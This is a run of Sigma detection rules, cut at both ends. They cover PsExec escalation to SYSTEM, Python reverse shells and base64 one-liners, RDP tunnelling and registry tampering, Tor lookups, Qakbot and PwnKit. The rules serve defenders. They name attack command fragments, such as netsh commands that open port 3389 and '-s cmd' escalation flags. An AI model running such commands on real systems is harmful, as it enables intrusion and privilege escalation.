tags:
    - attack.lateral-movement
    - attack.t1021.002
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 5145
        ShareName|contains: 'IPC'
        RelativeTargetName: 'protected_storage'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Proxy Execution Via Wuauclt.EXE
id: af77cf95-c469-471c-b6a0-946c685c4798
related:
    - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0
      type: obsolete
    - id: d7825193-b70a-48a4-b992-8b5b3015cc11
      type: obsolete
status: test
description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
references:
    - https://dtm.uk/wuauclt/
    - https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
date: 2020-10-12
modified: 2023-11-11
tags:
    - attack.stealth
    - attack.t1218
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\wuauclt.exe'
        - OriginalFileName: 'wuauclt.exe'
    selection_cli:
        CommandLine|contains|all:
            - 'UpdateDeploymentProvider'
            - 'RunHandlerComServer'
    filter_main_generic:
        # Note: Please enhance this if you find the full path
        CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll '
    filter_main_wuaueng:
        # Note: Please enhance this if you find the full path
        CommandLine|contains: ' wuaueng.dll '
    filter_main_uus:
        CommandLine|contains:
            - ':\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId'
            - ':\Windows\UUS\amd64\UpdateDeploy.dll /ClassId'
    filter_main_winsxs:
        CommandLine|contains|all:
            - ':\Windows\WinSxS\'
            - '\UpdateDeploy.dll /ClassId '
    condition: all of selection_* and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high

title: Ps.exe Renamed SysInternals Tool
id: 18da1007-3f26-470f-875d-f77faf1cab31
status: test
description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
references:
    - https://www.us-cert.gov/ncas/alerts/TA17-293A
author: Florian Roth (Nextron Systems)
date: 2017-10-22
modified: 2023-05-02
tags:
    - attack.stealth
    - attack.g0035
    - attack.t1036.003
    - car.2013-05-009
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'ps.exe -accepteula'
            - '-s cmd /c netstat'
    condition: selection
falsepositives:
    - Renamed SysInternals tool
level: high

title: PsExec Service Child Process Execution as LOCAL SYSTEM
id: 7c0dcd3d-acf8-4f71-9570-f448b0034f94
related:
    - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba
      type: similar
status: test
description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
references:
    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
author: Florian Roth (Nextron Systems)
date: 2022-07-21
modified: 2023-02-28
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage: 'C:\Windows\PSEXESVC.exe'
        User|contains: # covers many language settings
            - 'AUTHORI'
            - 'AUTORI'
    condition: selection
falsepositives:
    - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
level: high

title: PsExec/PAExec Escalation to LOCAL SYSTEM
id: 8834e2f7-6b4b-4f09-8906-d2276470ee23
related:
    - id: 207b0396-3689-42d9-8399-4222658efc99 # Generic rule based on similar cli flags
      type: similar
status: test
description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
references:
    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
    - https://www.poweradmin.com/paexec/
    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2021-11-23
modified: 2024-03-05
tags:
    - attack.resource-development
    - attack.t1587.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_sys: # Escalation to LOCAL_SYSTEM
        CommandLine|contains|windash:
            # Note that you don't need to add the ".exe" part when using psexec/paexec
            # The "-" can also be replaced with "/"
            # The order of args isn't important
            # "cmd" can be replaced by "powershell", "pwsh" or any other console like software
            - ' -s cmd'
            - ' -s -i cmd'
            - ' -i -s cmd'
            # Pwsh (For PowerShell 7)
            - ' -s pwsh'
            - ' -s -i pwsh'
            - ' -i -s pwsh'
            # PowerShell (For PowerShell 5)
            - ' -s powershell'
            - ' -s -i powershell'
            - ' -i -s powershell'
    selection_other:
        CommandLine|contains:
            - 'psexec'
            - 'paexec'
            - 'accepteula'
    condition: all of selection_*
falsepositives:
    - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)
    - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
level: high

title: Publicly Accessible RDP Service
id: 1fc0809e-06bf-4de3-ad52-25e5263b7623
status: test
description: |
    Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.
author: Josh Brower @DefensiveDepth
date: 2020-08-22
modified: 2024-03-13
tags:
    - attack.lateral-movement
    - attack.t1021.001
logsource:
    product: zeek
    service: rdp
detection:
    selection:
        id.orig_h|cidr:
            - '::1/128'  # IPv6 loopback
            - '10.0.0.0/8'
            - '127.0.0.0/8'
            - '172.16.0.0/12'
            - '192.168.0.0/16'
            - '169.254.0.0/16'
            - '2620:83:8000::/48'
            - 'fc00::/7'  # IPv6 private addresses
            - 'fe80::/10'  # IPv6 link-local addresses
    # approved_rdp:
      # dst_ip:
        # - x.x.x.x
    condition: not selection # and not approved_rdp
falsepositives:
    - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet.
level: high

title: Pulse Connect Secure RCE Attack CVE-2021-22893
id: 5525edac-f599-4bfd-b926-3fa69860e766
status: stable
description: This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)
references:
    - https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html
    - https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784
author: Sittikorn S
date: 2021-06-29
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-22893
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection1:
        cs-uri-query|contains:
            - '/dana-na/auth/'
            - '/dana-ws/'
            - '/dana-cached/'
    selection2:
        cs-uri-query|contains:
            - '?id='
            - '?token='
            - 'Secid_canceltoken.cgi'
            - 'CGI::param'
            - 'meeting'
            - 'smb'
            - 'namedusers'
            - 'metric'
    condition: all of selection*
falsepositives:
    - Vulnerability Scanning
level: high

title: PwnKit Local Privilege Escalation
id: 0506a799-698b-43b4-85a1-ac4c84c720e9
status: test
description: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs
references:
    - https://twitter.com/wdormann/status/1486161836961579020
author: Sreeman
date: 2022-01-26
modified: 2024-09-11
tags:
    - attack.privilege-escalation
    - attack.t1548.001
    - detection.emerging-threats
    - cve.2021-4034
logsource:
    product: linux
    service: auth
detection:
    keywords:
        '|all':
            - 'pkexec'
            - 'The value for environment variable XAUTHORITY contains suspicious content'
            - '[USER=root] [TTY=/dev/pts/0]'
    condition: keywords
falsepositives:
    - Unknown
level: high

title: Python Function Execution Security Warning Disabled In Excel
id: 023c654f-8f16-44d9-bb2b-00ff36a62af9
related:
    - id: 17e53739-a1fc-4a62-b1b9-87711c2d5e44
      type: similar
status: test
description: |
    Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
    Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
references:
    - https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
author: '@Kostastsale'
date: 2023-08-22
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '\Microsoft\Office\'
            - '\Excel\Security'
            - 'PythonFunctionWarnings'
        CommandLine|contains: ' 0'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Python Function Execution Security Warning Disabled In Excel - Registry
id: 17e53739-a1fc-4a62-b1b9-87711c2d5e44
related:
    - id: 023c654f-8f16-44d9-bb2b-00ff36a62af9
      type: similar
status: test
description: |
    Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
    Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
references:
    - https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale
date: 2024-08-23
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Microsoft\Office\'
        TargetObject|endswith: '\Excel\Security\PythonFunctionWarnings'
        Details: 'DWORD (0x00000001)'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Python One-Liners with Base64 Decoding
id: 50a0aa3d-ab16-4594-a8aa-5145a6e6792b
related:
    - id: 55e862a8-dd9c-4651-807a-f21fcad56716
      type: similar
status: experimental
description: |
    Detects Python one-liners that use base64 decoding functions in command line executions.
    Malicious scripts or attackers often use python one-liners to decode and execute base64-encoded payloads, which is a common technique for obfuscation and evasion.
references:
    - https://docs.python.org/3/library/base64.html
    - https://www.virustotal.com/gui/file/bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db/behavior
    - https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites
author: Hugh Ryan (HueCodes), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-03-09
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.006
    - attack.t1027.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|contains: '\python'
        - OriginalFileName|contains: 'python'
    selection_cli:
        CommandLine|contains|all:
            - 'import'
            - 'base64'
            - ' -c'
        CommandLine|contains:
            - '.decode'
            - 'b16decode'
            - 'b32decode'
            - 'b32hexdecode'
            - 'b64decode'
            - 'b85decode'
            - 'z85decode'
    condition: all of selection_*
falsepositives:
    - Legitimate use of Python for decoding data, which is uncommon in typical enterprise environments but possible in development or data analysis contexts.
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_python_base64_encoded_execution/info.yml

title: Python One-Liners with Base64 Decoding - Linux
id: 55e862a8-dd9c-4651-807a-f21fcad56716
related:
    - id: 50a0aa3d-ab16-4594-a8aa-5145a6e6792b
      type: similar
status: experimental
description: |
    Detects the use of Python's base64 decoding functions in command line executions on Linux systems.
    Malicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is a common technique for obfuscation and evasion.
references:
    - https://docs.python.org/3/library/base64.html
    - https://www.virustotal.com/gui/file/bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db/behavior
    - https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites
author: Hugh Ryan (HueCodes), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-03-09
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.006
    - attack.t1027.010
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|contains: '/python'
    selection_cli:
        CommandLine|contains|all:
            - 'import'
            - 'base64'
            - ' -c'
        CommandLine|contains:
            - '.decode'
            - 'b16decode'
            - 'b32decode'
            - 'b32hexdecode'
            - 'b64decode'
            - 'b85decode'
            - 'z85decode'
    condition: all of selection_*
falsepositives:
    - Legitimate use of Python for decoding data, which is uncommon in typical enterprise environments but possible in development or data analysis contexts.
level: high

title: Python Reverse Shell Execution Via PTY And Socket Modules
id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
related:
    - id: c4042d54-110d-45dd-a0e1-05c47822c937
      type: similar
status: test
description: |
    Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
references:
    - https://www.revshells.com/
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-24
modified: 2024-11-04
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: 'python'
        CommandLine|contains|all:
            - ' -c '
            - 'import'
            - 'pty'
            - 'socket'
            - 'spawn'
            - '.connect'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Python Spawning Pretty TTY on Windows
id: 480e7e51-e797-47e3-8d72-ebfce65b6d8d
related:
    - id: 899133d5-4d7c-4a7f-94ee-27355c879d90
      type: derived
status: test
description: Detects python spawning a pretty tty
references:
    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
author: Nextron Systems
date: 2022-06-03
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - 'python.exe' # no \ bc of e.g. ipython.exe
            - 'python3.exe'
            - 'python2.exe'
    selection_cli_1:
        CommandLine|contains|all:
            - 'import pty'
            - '.spawn('
    selection_cli_2:
        CommandLine|contains: 'from pty import spawn'
    condition: selection_img and 1 of selection_cli_*
falsepositives:
    - Unknown
level: high

title: Qakbot Regsvr32 Calc Pattern
id: 0033cf83-fb87-446d-9cac-43d63ad4d5a9
status: test
description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
references:
    - https://github.com/pr0xylife/Qakbot/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-26
modified: 2024-03-05
tags:
    - attack.execution
    - detection.emerging-threats
    - attack.stealth
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains|windash: ' -s'
        CommandLine|endswith: ' calc'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Qakbot Uninstaller Execution
id: bc309b7a-3c29-4937-a4a3-e232473f9168
status: test
description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
references:
    - https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources
    - https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community
    - https://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community
author: Florian Roth (Nextron Systems)
date: 2023-08-31
modified: 2023-09-01
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\QbotUninstall.exe'
        - Hashes|contains:
              - 'IMPHASH=E772C815072311D6FB8C3390743E6BE5'
              - 'SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180'
              - 'SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6'
              - 'SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071'
              - 'SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Query Tor Onion Address - DNS Client
id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2
related:
    - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544
      type: similar
    - id: a8322756-015c-42e7-afb1-436e85ed3ff5
      type: similar
status: test
description: Detects DNS resolution of an .onion address related to Tor routing networks
references:
    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-02-20
modified: 2025-09-12
tags:
    - attack.command-and-control
    - attack.t1090.003
logsource:
    product: windows
    service: dns-client
    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
detection:
    selection:
        EventID: 3008
        QueryName|endswith:
            - '.hiddenservice.net'
            - '.onion.ca'
            - '.onion.cab'
            - '.onion.casa'
            - '.onion.city'
            - '.onion.direct'
            - '.onion.dog'
            - '.onion.glass'
            - '.onion.gq'
            - '.onion.guide'
            - '.onion.in.net'
            - '.onion.ink'
            - '.onion.it'
            - '.onion.link'
            - '.onion.lt'
            - '.onion.lu'
            - '.onion.ly'
            - '.onion.mn'
            - '.onion.network'
            - '.onion.nu'
            - '.onion.pet'
            - '.onion.plus'
            - '.onion.pt'
            - '.onion.pw'
            - '.onion.rip'
            - '.onion.sh'
            - '.onion.si'
            - '.onion.to'
            - '.onion.top'
            - '.onion.ws'
            - '.onion'
            - '.s1.tor-gateways.de'
            - '.s2.tor-gateways.de'
            - '.s3.tor-gateways.de'
            - '.s4.tor-gateways.de'
            - '.s5.tor-gateways.de'
            - '.t2w.pw'
            - '.tor2web.ae.org'
            - '.tor2web.blutmagie.de'
            - '.tor2web.com'
            - '.tor2web.fi'
            - '.tor2web.io'
            - '.tor2web.org'
            - '.tor2web.xyz'
            - '.torlink.co'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: RDP Connection Allowed Via Netsh.EXE
id: 01aeb693-138d-49d2-9403-c4f52d7d3d62
status: test
description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
references:
    - https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/
author: Sander Wiebing
date: 2020-05-23
modified: 2023-12-11
tags:
    - attack.defense-impairment
    - attack.t1686.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\netsh.exe'
        - OriginalFileName: 'netsh.exe'
    selection_cli:
        # Example:
        #   Old: netsh firewall add portopening TCP 3389 "Open Port 3389"
        #   New: netsh advfirewall firewall add rule name= "Open Port 3389" dir=in action=allow protocol=TCP localport=3389
        CommandLine|contains|all:
            - 'firewall '
            - 'add '
            - 'tcp '
            - '3389'
        CommandLine|contains:
            - 'portopening'
            - 'allow'
    condition: all of selection_*
falsepositives:
    - Legitimate administration activity
level: high

title: RDP Login from Localhost
id: 51e33403-2a37-4d66-a574-1fda1782cc31
status: test
description: RDP login with localhost source address may be a tunnelled login
references:
    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
author: Thomas Patzke
date: 2019-01-28
modified: 2022-10-09
tags:
    - attack.lateral-movement
    - car.2013-07-002
    - attack.t1021.001
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4624
        LogonType: 10
        IpAddress:
            - '::1'
            - '127.0.0.1'
    condition: selection
falsepositives:
    - Unknown
level: high

title: RDP Over Reverse SSH Tunnel
id: 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4
status: test
description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
references:
    - https://twitter.com/cyb3rops/status/1096842275437625346
author: Samir Bousseaden
date: 2019-02-16
modified: 2024-03-12
tags:
    - attack.command-and-control
    - attack.t1572
    - attack.lateral-movement
    - attack.t1021.001
    - car.2013-07-002
logsource:
    category: network_connection
    product: windows
detection:
    selection_img:
        Image|endswith: '\svchost.exe'
        Initiated: 'true'
        SourcePort: 3389
    selection_destination:
        DestinationIp|cidr:
            - '127.0.0.0/8'
            - '::1/128'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

title: RDP Port Forwarding Rule Added Via Netsh.EXE
id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63
status: test
description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
references:
    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
author: Florian Roth (Nextron Systems), oscd.community
date: 2019-01-29
modified: 2023-02-13
tags:
    - attack.lateral-movement
    - attack.command-and-control
    - attack.t1090
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\netsh.exe'
        - OriginalFileName: 'netsh.exe'
    selection_cli:
        CommandLine|contains|all:
            - ' i'
            - ' p'
            - '=3389'
            - ' c'
    condition: all of selection_*
falsepositives:
    - Legitimate administration activity
level: high

title: RDP Sensitive Settings Changed
id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c
related:
    - id: 171b67e1-74b4-460e-8d55-b331f3e32d67
      type: obsolete
    - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3
      type: obsolete
    - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b
      type: similar
status: test
description: |
    Detects tampering of RDP Terminal Service/Server sensitive settings.
    Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.

    Below is a list of registry keys/values that are monitored by this rule:

    - Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.
    - DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.
    - DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.
    - fAllowUnsolicited: Allows unsolicited remote assistance offers.
    - fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.
    - InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.
    - ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.
    - SecurityLayer: Specifies the security layer used for RDP connections.
references:
    - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contains description for most of the keys mentioned here (check it out if you want more information)
    - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique
    - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contains description for most of the keys mentioned here (check it out if you want more information)
    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
    - https://blog.sekoia.io/darkgate-internals/
    - https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/
    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry
    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry
    - https://github.com/redcanaryco/atomic-red-team/blob/dd526047b8c399c312fee47d1e6fb531164da54d/atomics/T1112/T1112.yaml#L790
    - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer
    - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html
    - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique
    - https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key
    - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html
author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
date: 2022-08-06
modified: 2025-11-22
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: registry_set
    product: windows
detection:
    selection_shadow:
        TargetObject|contains:
            - '\Control\Terminal Server\'
            - '\Windows NT\Terminal Services\'
        TargetObject|endswith: '\Shadow'
        Details:
            - 'DWORD (0x00000001)' # Full Control with user’s permission
            - 'DWORD (0x00000002)' # Full Control without user’s permission
            - 'DWORD (0x00000003)' # View Session with user’s permission
            - 'DWORD (0x00000004)' # View Session without user’s permission
    selection_terminal_services_key:
        TargetObject|contains:
            - '\Control\Terminal Server\'
            - '\Windows NT\Terminal Services\'
        TargetObject|endswith:
            - '\DisableRemoteDesktopAntiAlias' # Disable anti-aliasing for remote desktop (DarkGate malware)
            - '\DisableSecuritySettings' # Disable security settings, allowing access to programs/entire desktop (DarkGate malware)
            - '\fAllowUnsolicited' # Allow unsolicited remote assistance offers
            - '\fAllowUnsolicitedFullControl'
        Details: 'DWORD (0x00000001)'
    selection_tamper_only:
        # Any changes to these keys should be suspicious and looked at
        TargetObject|contains:
            - '\Control\Terminal Server\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
            - '\Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
            - '\services\TermService\Parameters\ServiceDll' # RDP hijacking
            - '\Terminal Server\WinStations\RDP-Tcp\SecurityLayer'
            - '\Windows NT\Terminal Services\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
    filter_main_securitylayer_tls:
        TargetObject|endswith: '\SecurityLayer'
        Details: 'DWORD (0x00000002)' # TLS Enabled
    condition: (selection_shadow or selection_terminal_services_key or selection_tamper_only) and not 1 of filter_main_*
falsepositives:
    - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
level: high

title: RDP over Reverse SSH Tunnel WFP
id: 5bed80b6-b3e8-428e-a3ae-d3c757589e41
status: test
description: Detects svchost hosting RDP termsvcs communicating with the loopback address
references:
    - https://twitter.com/SBousseaden/status/1096148422984384514
    - https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx
author: Samir Bousseaden
date: 2019-02-16
modified: 2022-09-02
tags:
    - attack.command-and-control
    - attack.lateral-movement
    - attack.t1090.001
    - attack.t1090.002
    - attack.t1021.001
    - car.2013-07-002
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 5156
    sourceRDP:
        SourcePort: 3389
        DestAddress:
            - '127.*'
            - '::1'
    destinationRDP:
        DestPort: 3389
        SourceAddress:
            - '127.*'
            - '::1'
    filter_app_container:
        FilterOrigin: 'AppContainer Loopback'
    filter_thor:  # checking BlueKeep vulnerability
        Application|endswith:
            - '\thor.exe'
            - '\thor64.exe'
    condition: selection and ( sourceRDP or destinationRDP ) and not 1 of filter*
falsepositives:
    - Programs that connect locally to the RDP port
level: high

title: RDP to HTTP or HTTPS Target Ports
id: b1e5da3b-ca8e-4adf-915c-9921f3d85481
status: test
description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
references:
    - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg
    - https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling
author: Florian Roth (Nextron Systems)
date: 2022-04-29
modified: 2022-07-14
tags:
    - attack.command-and-control
    - attack.t1572
    - attack.lateral-movement
    - attack.t1021.001
    - car.2013-07-002
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith: '\svchost.exe'
        Initiated: 'true'
        SourcePort: 3389
        DestinationPort:
            - 80
            - 443
    condition: selection
falsepositives:
    - Unknown
level: high

title: RTCore Suspicious Service Installation
id: 91c49341-e2ef-40c0-ac45-49ec5c3fe26c
status: test
description: Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse
references:
    - https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-30
tags:
    - attack.persistence
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: 'RTCore64'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Raccine Uninstall
id: a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc
status: test
description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
references:
    - https://github.com/Neo23x0/Raccine
author: Florian Roth (Nextron Systems)
date: 2021-01-21
modified: 2022-10-09
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        CommandLine|contains|all:
            - 'taskkill '
            - 'RaccineSettings.exe'
    selection2:
        CommandLine|contains|all:
            - 'reg.exe'
            - 'delete'
            - 'Raccine Tray'
    selection3:
        CommandLine|contains|all:
            - 'schtasks'
            - '/DELETE'
            - 'Raccine Rules Updater'
    condition: 1 of selection*
falsepositives:
    - Legitimate deinstallation by administrative staff
level: high

title: Rar Usage with Password and Compression Level
id: faa48cae-6b25-4f00-a094-08947fef582f
status: test
description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
references:
    - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/
    - https://ss64.com/bash/rar.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: '@ROxPinTeddy'
date: 2020-05-12
modified: 2022-03-16
tags:
    - attack.collection
    - attack.t1560.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_password:
        CommandLine|contains: ' -hp'
    selection_other:
        CommandLine|contains:
            - ' -m'
            - ' a '
